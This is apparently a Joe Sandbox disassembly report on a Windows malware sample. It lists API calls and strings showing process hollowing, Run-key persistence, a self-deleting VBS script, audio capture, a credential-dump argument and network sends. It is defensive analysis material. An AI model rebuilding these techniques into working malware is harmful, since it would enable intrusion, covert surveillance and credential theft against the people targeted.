                                          • Instruction Fuzzy Hash: B991B1316082005AC315FB62D8529AFB3A8AF94309F50443FB64AA71E3EF7C9D49C65E
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                          • GetLastError.KERNEL32 ref: 004184B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                          • API String ID: 4188446516-3035715614
                                          • Opcode ID: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                          • Instruction ID: 6e605283caf6159cf0966bfa06415cd8be065dbd330dc5e1b11c181c8b11ae87
                                          • Opcode Fuzzy Hash: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                          • Instruction Fuzzy Hash: 5AA14DB0604301AFDB209F64DD85B6B7BE8FB88745F04482EF689D6291EB78DC44CB59
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                          • ExitProcess.KERNEL32 ref: 0040D454
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: ")$.vbs$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$tMG$wend$while fso.FileExists("$xdF$xpF
                                          • API String ID: 3797177996-4161133245
                                          • Opcode ID: ef64bbdb6b6bc413f4a38ff03c8248d9edabe3d8d9292ccc6fe4a1ee121b6e30
                                          • Instruction ID: d04a29aa4e51556796b06844e147f4a7cb6a24a543372ca0e3e4f3e54a9e1c14
                                          • Opcode Fuzzy Hash: ef64bbdb6b6bc413f4a38ff03c8248d9edabe3d8d9292ccc6fe4a1ee121b6e30
                                          • Instruction Fuzzy Hash: 7781A1716082405BC715FB62D8529AF73A8AF94308F10443FB58A671E3EF7C9E49C69E
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750F4,00000003), ref: 004124CF
                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                          • String ID: (TG$.exe$HSG$WDH$exepath$open$temp_
                                          • API String ID: 2649220323-4116078715
                                          • Opcode ID: 1946e344db4618885ae756797aea411b1648c6a2fe0413653f6271bec6169604
                                          • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                          • Opcode Fuzzy Hash: 1946e344db4618885ae756797aea411b1648c6a2fe0413653f6271bec6169604
                                          • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
                                          APIs
                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EF0,00000000), ref: 0041B21F
                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                          • API String ID: 738084811-1354618412
                                          • Opcode ID: 8d58fbfb6190c3f3b09755e9cec4986d803daceaa2324f9e2d03a17bc5feb97a
                                          • Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
                                          • Opcode Fuzzy Hash: 8d58fbfb6190c3f3b09755e9cec4986d803daceaa2324f9e2d03a17bc5feb97a
                                          • Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
                                          • WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
                                          • WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
                                          • WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Write$Create
                                          • String ID: RIFF$WAVE$data$fmt
                                          • API String ID: 1602526932-4212202414
                                          • Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                          • Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
                                          • Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                          • Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000001,00407688,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000003,004076B0,004752E8,00407709), ref: 004072BF
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                          • API String ID: 1646373207-2634879609
                                          • Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                          • Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
                                          • Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                          • Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040CE42
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                          • _wcslen.LIBCMT ref: 0040CF21
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000000,00000000), ref: 0040CFBF
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                          • _wcslen.LIBCMT ref: 0040D001
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750F4,0000000E), ref: 0040D068
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                          • ExitProcess.KERNEL32 ref: 0040D09D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                          • String ID: 6$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$del$open$xdF$RG$RG
                                          • API String ID: 1579085052-3150217690
                                          • Opcode ID: 0fa9b5b1dd786efaf3be6b7155859af5081faa42a1eb35d72d6144a2fd8a8eb1
                                          • Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
                                          • Opcode Fuzzy Hash: 0fa9b5b1dd786efaf3be6b7155859af5081faa42a1eb35d72d6144a2fd8a8eb1
                                          • Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                          • _wcslen.LIBCMT ref: 0041C1CC
                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                          • GetLastError.KERNEL32 ref: 0041C204
                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                          • GetLastError.KERNEL32 ref: 0041C261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                          • String ID: ?
                                          • API String ID: 3941738427-1684325040
                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$EnvironmentVariable$_wcschr
                                          • String ID:
                                          • API String ID: 3899193279-0
                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                          • String ID: /stext "$,aF$@TG$@TG
                                          • API String ID: 1223786279-971885606
                                          • Opcode ID: fec93c9289c1766bf46719126c79de9011d1f9e0700ce836de87cdf7ea2c4a35
                                          • Instruction ID: 54c64e465a66050ec466d83b34d0c9889d7f3cdaa7358c1e9e14d2467042f0e2
                                          • Opcode Fuzzy Hash: fec93c9289c1766bf46719126c79de9011d1f9e0700ce836de87cdf7ea2c4a35
                                          • Instruction Fuzzy Hash: 5B0268315083414AC325FB62D891AEFB3E5AFD0348F50483FF58A971E2EF785A49C65A
                                          APIs
                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                          • Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                          • String ID: Close
                                          • API String ID: 1657328048-3535843008
